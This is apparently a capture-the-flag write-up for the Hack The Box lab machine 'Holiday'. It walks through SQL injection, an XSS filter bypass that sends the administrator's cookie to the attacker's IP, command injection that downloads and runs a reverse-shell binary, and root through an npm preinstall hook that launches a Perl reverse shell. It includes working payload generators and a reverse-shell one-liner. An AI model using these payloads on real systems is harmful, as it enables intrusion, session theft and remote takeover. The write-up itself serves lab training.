Holiday: hack the box

Category: Programming tools · Published: 4 years ago

Summary: Target: 10.10.10.25 (Linux); Kali: 10.10.16.65


Introduction

Target: 10.10.10.25(Linux)

Kali: 10.10.16.65

Holiday is officially rated Insane. Getting the user is the hard part; the most difficult step is bypassing the XSS filter, which can take a long time. The root privilege escalation abuses npm install, which was a relatively fresh technique at the time.

Information enumeration

As usual, use nmap to find open ports and the services behind them: nmap -A 10.10.10.25

Only two ports are open. Port 8000 is an HTTP service served by Express; that is the way in.

Exploitation

Open http://10.10.10.25:8000 . There is nothing except an image. Download it and inspect it with ExifTool; nothing interesting is found.


Then brute-force directories. Gobuster and DirBuster are not very useful on this box, but dirb quickly finds some important directories, including admin and login. Open http://10.10.10.25:8000/login : it is a login page. Default credentials do not work, so use Burp to save the login request to a file.

Sqlmap

Feed the saved login request to sqlmap. Because of a poor network connection (or something similar), sqlmap is slow for me against Hack The Box machines, so rather than dumping everything, pull out the important information in stages: list the tables first, then dig into the interesting one.


sqlmap reports that the database is SQLite and that it has 5 tables. The users table is the interesting one: it may hold valid usernames and password hashes.


One user is found. Hashkiller, an online hash-cracking service, cracks the hash easily.


Log in as this user. The application is a booking website.


Click any booking to see its details. The page has two tabs, View and Notes. In Notes, one sentence stands out: "All notes must be approved by an administrator - this process can take up to 1 minute." An administrator is always attractive to an attacker: if the note is reviewed by the administrator, and the note form has an XSS vulnerability, the administrator's session cookie can be stolen. I think this is the hardest part of the box, because finding a payload that survives the filter is not easy. One way through is to build the payload with String.fromCharCode, so that the forbidden characters never appear in the note itself. JavaScript is used to generate the encoded payload.


Start a listener on port 80 in Kali: nc -lvnp 80 . The generator can be run in the Chrome DevTools console. Paste the generated payload into the note, wait about a minute, and the data is sent to Kali.
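The encoding trick described above, written out as an added example (this is not the author's generator, which is not reproduced here): the script to run in the administrator's browser is turned into a String.fromCharCode(...) expression, so the note body contains no quotes, slashes or semicolons. The attacker host 10.10.16.65 and listener port 80 follow the writeup; the img/onerror wrapper and the exact set of characters the filter rejects are assumptions.

```javascript
// Added example: encode an XSS payload with String.fromCharCode so that the
// characters a naive filter rejects never appear in the submitted note.
// The tag/handler choice and the forbidden-character set are assumptions.

// Turn an arbitrary string into a String.fromCharCode(...) expression that
// evaluates back to it. The result contains only letters, digits, commas,
// parentheses and one dot.
function toCharCodeExpr(str) {
  const codes = Array.from(str, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// Reverse operation: confirms a generated expression decodes to the
// intended script before it is pasted anywhere.
function fromCharCodeExpr(expr) {
  const m = /^String\.fromCharCode\(([\d,]*)\)$/.exec(expr);
  if (!m) throw new Error('not a fromCharCode expression');
  if (m[1] === '') return '';
  return String.fromCharCode(...m[1].split(',').map(Number));
}

// The script we want the administrator's browser to run: exfiltrate
// document.cookie to our listener as the query string of an image request.
// A plain nc listener shows the GET line, which carries the cookie.
function exfilScript(attackerHost) {
  return `new Image().src='http://${attackerHost}/?c='+document.cookie`;
}

// Wrap the encoded script in an event handler. Which tag and handler get
// past the filter is box-specific; img/onerror is assumed here.
function buildPayload(attackerHost) {
  const inner = toCharCodeExpr(exfilScript(attackerHost));
  return `<img src=x onerror=eval(${inner})>`;
}

// Characters assumed to be stripped or rejected by the filter. The handler
// body (everything after "onerror=") must not contain any of them.
function handlerBodyIsClean(payload) {
  const start = payload.indexOf('onerror=') + 'onerror='.length;
  const body = payload.slice(start, -1); // drop the closing ">"
  return !/["'`<>\/;]/.test(body);
}

console.log(buildPayload('10.10.16.65'));
```

Decode the generated expression with fromCharCodeExpr before submitting it; a single wrong character code silently breaks the script and the note is simply approved without calling back.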

The administrator's cookie arrives HTML-encoded. Decode it with Burp's Decoder, replace the cookie in Firefox's Storage tab and refresh the page: the administrator's session is now hijacked. Open http://10.10.10.25:8000/admin . There is nothing special there except two buttons, Booking and Notes.


After some exploration you will find that the URLs behind those two functions are vulnerable to command injection. Request http://10.10.10.25:8000/admin/export?table=notes%26ls and the exported file contains a directory listing, so the table name ends up in a shell command. One thing to notice: a literal & is rejected, but the URL-encoded form %26 gets through, which is how the command is chained. The injected command is limited to letters, digits and / (with space and & reaching the shell only as %20 and %26), so you have to build the RCE from those. A one-liner reverse shell such as rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f is not possible: it needs ; | > and the dots in the IP address, none of which are allowed.


Use msfvenom to generate a Linux reverse-shell binary named shell, and serve it from Kali on port 80 so that wget can fetch it:

Then upload the shell to the target and execute it. Because . is not allowed either, convert the attacker's IP address to its decimal form with an online converter (or by hand: 10.10.16.65 is 10*256^3 + 10*256^2 + 16*256 + 65 = 168431681); wget accepts a host written this way. Request the following URLs to run the corresponding commands:

  • upload the shell:  http://10.10.10.25:8000/admin/export?table=notes%26cd%20/tmp%20%26%26wget%20168431681/shell

  • make it executable:  http://10.10.10.25:8000/admin/export?table=notes%26chmod%20777%20/tmp/shell

  • execute the shell:  http://10.10.10.25:8000/admin/export?table=notes%26/tmp/shell (the binary has to be invoked by its path; a cd /tmp/shell would only change directory and run nothing)

Before requesting the last URL, start the Metasploit handler (multi/handler) in Kali with the same payload that msfvenom was given.
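The three staging requests above, generated rather than typed by hand, as an added example that is not part of the original post. It converts the attacker address to decimal, rejects any character the filter would block, and emits the same URLs the writeup lists. The base URL, table name and the chaining via %26 come from the writeup; the exact allowed character set (letters, digits, space and /) is taken from the writeup's description and is an assumption about the filter.

```javascript
// Added example: build the command-injection URLs for the export endpoint.
// Allowed-character set is assumed from the writeup's description.

// Dotted-quad IPv4 to the single decimal integer that wget also accepts,
// which avoids the forbidden "." character (10.10.16.65 -> 168431681).
function ipToDecimal(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 ||
      parts.some((o) => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error(`bad IPv4 address: ${ip}`);
  }
  // Multiply instead of shifting: << would turn bit 31 into a sign bit.
  return parts.reduce((acc, o) => acc * 256 + o, 0);
}

// Reverse conversion, for checking the number before it goes into a URL.
function decimalToIp(n) {
  return [24, 16, 8, 0].map((s) => Math.floor(n / 2 ** s) % 256).join('.');
}

// Encode a command for the table parameter. Letters, digits and "/" pass
// through; space and "&" are only accepted in URL-encoded form, as the
// writeup found; everything else is rejected up front so a bad request
// never reaches the target.
function encodeForTableParam(cmd) {
  let out = '';
  for (const c of cmd) {
    if (/[A-Za-z0-9/]/.test(c)) out += c;
    else if (c === ' ') out += '%20';
    else if (c === '&') out += '%26';
    else throw new Error(`character not allowed by the filter: ${JSON.stringify(c)}`);
  }
  return out;
}

// A valid table name followed by %26 and the injected command.
function buildExportUrl(base, table, cmd) {
  return `${base}/admin/export?table=${table}%26${encodeForTableParam(cmd)}`;
}

// The full staging sequence: fetch the binary, make it executable, run it.
// The attacker is assumed to serve the binary over HTTP on port 80.
function stagingUrls(base, attackerIp, binary = '/tmp/shell') {
  const host = ipToDecimal(attackerIp);
  const name = binary.split('/').pop();
  return [
    buildExportUrl(base, 'notes', `cd /tmp && wget ${host}/${name}`),
    buildExportUrl(base, 'notes', `chmod 777 ${binary}`),
    buildExportUrl(base, 'notes', binary),
  ];
}

for (const u of stagingUrls('http://10.10.10.25:8000', '10.10.16.65')) console.log(u);
```

The encoder throws on the first forbidden character, which is the quickest way to see why a classic nc or mkfifo one-liner cannot be injected here: the dots in the IP and the ; and | are all rejected before the request is built.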

Then, we get the shell!


Privilege escalation

Check the sudo permissions first: sudo -l . The user is allowed to run sudo npm i . The rimrafall repository demonstrates that npm install can be dangerous: a package's install scripts run arbitrary commands. You can upload that directory to the target or create one yourself.

Create the package.json and upload it to the target directory. The preinstall script is what runs the command. I found that some reverse-shell commands do not work from there. Perl is installed on the machine, so create a file called prel3 that opens the reverse shell with Perl.
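A minimal package.json of the kind described above, added here as an example and not the author's file. The directory name rimrafall and the listener port 3344 follow the writeup; prel3 is the script name the writeup mentions and is assumed to contain a Perl reverse shell back to 10.10.16.65:3344. npm runs lifecycle scripts with the package directory as the working directory, so the relative path works.

```json
{
  "name": "rimrafall",
  "version": "1.0.0",
  "private": true,
  "description": "added example: preinstall hook that runs prel3 (assumed Perl reverse shell) as the user running npm install",
  "scripts": {
    "preinstall": "perl prel3"
  }
}
```

Two things to check if the shell does not arrive as root. First, npm 6 and earlier, when invoked as root, drop to a less privileged user for lifecycle scripts unless --unsafe-perm is set, so the preinstall hook may run unprivileged; second, the writeup invokes the package by bare name (sudo npm i rimrafall), and if npm resolves that as a registry package instead of the local directory, pass an explicit path such as ./rimrafall, as far as the sudo rule allows.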

Start a listener on port 3344 in Kali: nc -lvnp 3344 . On the target, run: sudo npm i rimrafall . Now we are root!

